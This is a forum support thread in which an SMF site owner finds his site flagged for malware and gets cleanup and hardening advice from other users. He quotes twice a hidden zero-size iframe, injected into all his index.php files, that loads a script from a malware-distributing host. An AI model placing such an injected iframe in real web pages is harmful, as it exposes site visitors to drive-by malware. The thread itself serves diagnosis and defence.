My site has been infected with Malware called pokosa :(

Started by agent47, February 07, 2012, 05:35:24 AM

Previous topic - Next topic

agent47

Guys my site was doing perfectly fine until today when my browser started bringing up this error:

Warning: Something's Not Right Here!
www {dot} superheroalliance {dot} net contains content from pokosa.com, a site known to distribute malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified pokosa.com that we found malware on the site. For more about the problems found on pokosa.com, visit the Google Safe Browsing diagnostic page.

Please tell me how this can be resolved as it seems to be frightening away my members :'(
I don't know what has caused this but it sure as hell is making me sad. Kindly help me out with this someone.

PortaMx is probably the best SMF portal!

agent47

So I did a view page source of my site and found this at the end:

<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

The question is how do I remove as in which file should I look into in order to remove this link?

Edited by K@ to add...

IF ANYONE'S CURIOUS AND WANTS TO CLICK ON THE LINK IN THIS POST... DON'T!

PortaMx is probably the best SMF portal!

Illori

check which files have been recently edited and go from there.

agent47


PortaMx is probably the best SMF portal!

floridaflatlander


青山 素子

Quote from: floridaflatlander on February 07, 2012, 09:10:17 AM
How did this get there in the first place?

There are many ways. Brute-forcing of FTP or other credentials, exploit of a different software on the same account, exploit of a different site on the same server if the server is poorly-secured, server-level security breach, ...
Motoko-chan
Director, Simple Machines

Note: Unless otherwise stated, my posts are not representative of any official position or opinion of Simple Machines.


Xarcell

It would be nice to know how this happened, so others can try to avoid the same situation.

agent47

Quote from: Xarcell on February 08, 2012, 04:13:07 PM
It would be nice to know how this happened, so others can try to avoid the same situation.
If I knew I would explain mate but only today did I discover that ALL my index.php files seem to be affected. It has basically appended the following line:
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe> onto all of my index.php files and I mean all so now I have to manually remove them from each of the files :(
Wish I knew how this happened.

PortaMx is probably the best SMF portal!

Roph

It isn't enough to just clean it up. The fact that it's been done proves that you are somehow vulnerable. It's important that you must close the vulnerability by which they got in.

You should also check the .htaccess files in your account, they are another common target of malicious edits to try and slip by nasty stuff.

Think about all the other scripts you have installed, besides SMF, and check their versions. If any have new versions available, update them. You should also check through all .php scripts, not just index.php scripts. Look at their last modified times, or look for new files with strange names.

NanoSector

Also change all of your passwords. Wait with that one until you've fixed all the others that Roph mentioned, though, as the change of this happening twice is quite big if you don't close the holes.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

tumbleweed

looks like a Iframe hack. Without a clear inventory of what is in the OPs web space (in relationship to other software) it is hard t tell how they got in.
G.C. SOLUTIONS - Hosting Quality Sites Since 2006. Experience Your Forums On A Whole New Level
Elastic Sites Stress Fast CPU/Ram Upgrades- More Info Here.
Reviews By SMF Forum Owners - Read Our Rev

Lawrence Wright

Double check your directory permissions. Remember,

0644 For Files
0755 For Directories

Also make sure you're not running any unconfigured web based file editors.

Illori

not all servers will have the files writable to the server with 644 and 755, you are best to contact your host, or even better not have the files writable to the server unless you are installing mods.

Advertisement: